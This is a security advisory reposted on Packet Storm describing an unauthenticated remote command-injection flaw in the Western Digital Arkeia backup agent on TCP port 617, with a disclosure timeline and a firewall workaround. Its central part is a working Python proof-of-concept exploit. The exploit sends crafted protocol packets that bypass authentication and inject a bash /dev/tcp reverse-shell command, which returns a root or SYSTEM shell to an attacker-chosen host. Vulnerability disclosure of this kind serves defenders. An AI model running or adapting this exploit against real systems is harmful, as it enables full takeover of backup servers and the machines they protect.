Exploit the possiblities

Western Digital Arkeia 11.0.13 Remote Code Execution

Western Digital Arkeia 11.0.13 Remote Code Execution
Posted Jul 13, 2015
Authored by xistence

Western Digital Arkeia versions 11.0.12 and below suffer from a ARKFS_EXEC_CMD remote code execution vulnerability.

tags | exploit, remote, code execution
MD5 | c500356f0437fdc6b8b7135c840dbb1c

Western Digital Arkeia 11.0.13 Remote Code Execution

Change Mirror Download
## Advisory Information

Title: Western Digital Arkeia "ARKFS_EXEC_CMD" <= v11.0.12 Remote Code
Execution
Submitter: xistence <xistence[at]0x90.nl>
Date published: 2015-07-10
Vendors contacted: Western Digital / Arkeia
Class: OS Command Injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes


## Product Description

The WD Arkeia network backup suite comprises WD Arkeia software's suite of
backup-and-restore solutions. Administrators can deploy WD Arkeia's backup
servers as software applications, hardware appliances or virtual
appliances. WD is the first data protection company to deliver commercial
support for all three modes of backup server deployment, including
heterogeneous deployments.

Administrators manage WD Arkeia primarily through a Web-based
user-interface. A command-line interface provides equivalent access and is
more suitable when scripts or customization is desired.

WD Arkeia supports over 200 different physical platforms, including
virtually all Linux and Windows platforms, as well as AIX, BSD, HP-UX, Mac
OS X, Netware and Solaris, so you can centrally manage backups of all your
data. We also support virtual environments with a vStorage-based agent for
VMware vSphere and a VSS-based agent for Microsoft Hyper-V. We support
image backups of Citrix XenServer and Parallels Server 4 Bare Metal—and
will support image backups of RHEV as soon as Red Hat APIs make it possible.

WD Arkeia provides hot backup agents for a dozen databases, applications
agents and directory servers. We support backups to disk and to virtually
every tape drive and tape library on the market. Arkeia even supports cloud
storage options.


## Vulnerability

Arkeia provides an agent which can be installed on a windows/*nix system to
make backups. This agent needs to listen on TCP port 617 on the network
interface to allow for communication between the central Arkeia
server/appliance and the agent.
The agent is not only installed on the client, but also by default on the
central Arkeia backup server/appliance.

Before or after a backup session it's possible to run commands on the
agent's system. This calls the function "ARKFS_EXEC_CMD" in the Arkeia
communication protocol to execute a script on the remote system.
It is however possible to bypass the authentication validation, which makes
it possible to execute these scripts without being authenticated.

The script name that's supposed to be executed can have a maximum length of
255 bytes. Instead of scripts it's also possible to execute direct commands
and thus makes it possible to perform remote code execution.

As stated above, this allows for remote code execution on every
workstation/server that runs the agent, including the central Arkeia backup
server as well!
Command execution is done with "SYSTEM" privileges on windows and "root"
privilegs on linux/*nix.


## Exploit

Below is a simple PoC, a full exploit will be submitted to Metasploit.

#!/usr/bin/python

import socket, sys
from struct import *

if (len(sys.argv) != 4):
print "[*] Usage: " + sys.argv[0] + " <IP of agent> <Own IP> <Own port>"
print "[*] i.e.:" + sys.argv[0] + " 192.168.2.124 192.168.2.109 8888"
print ""
exit(0)

payload1 = "\x00\x41\x00\x00\x00\x00\x00\x70" + "\x00"*12 +
"\xc0\xa8\x02\x8a" + "\x00"*56 +
"\x8a\x02\xa8\xc0\x41\x52\x4b\x46\x53\x00\x72\x6f\x6f\x74\x00\x72\x6f\x6f\x74\x00\x00\x00\x34\x2e\x33\x2e\x30\x2d\x31"
+ "\x00"*11
payload2 = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32" + "\x00"*11
payload3 =
"\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00\x31\x33\x39\x32\x37\x31\x32\x33\x39\x38\x00\x45\x4e"
+ "\x00"*11
payload4 =
"\x00\x62\x00\x01\x00\x02\x00\x1b\x41\x52\x4b\x46\x53\x5f\x45\x58\x45\x43\x5f\x43\x4d\x44\x00\x31"
+ "\x00"*11

cmd = "bash -i >& /dev/tcp/" + sys.argv[2] + "/" + sys.argv[3] + " 0>&1"

# Length of command
cmdLength = chr(len(cmd))

payload5 =
"\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
+ "\x00"*12 + "\x64\x00\x04\x00\x04\x00" + cmdLength + cmd + "\x00"

print "[*] - Sending payloads"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 617))

s.send(payload1)
s.recv(1024)
s.send(payload2)
s.recv(1024)
s.send(payload3)
s.recv(1024)
s.send(payload4)
s.recv(1024)

print "[*] - Requesting shell"
s.send(payload5)
s.recv(1024)
s.close()


## Solution

No fix available (yet) from vendor.
Recommended workaround: Firewall access to TCP port 617 where possible


## Disclosure Timeline

2015-01-07 - Contacted vendor with vulnerability information
2015-01-07 - Vendor responded that they will investigate the issue
2015-01-27 - Requested status update
2015-01-27 - Vendor responded that issue has been escalated
2015-02-25 - Requested status update
2015-03-13 - Vendor responded that case is still open and further
information will be provided later
2015-05-11 - Requested status update
2015-xx-xx - No response from vendor
2015-05-26 - Requested status update
2015-xx-xx - No response from vendor
2015-07-10 - Public disclosure of vulnerability


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    10 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close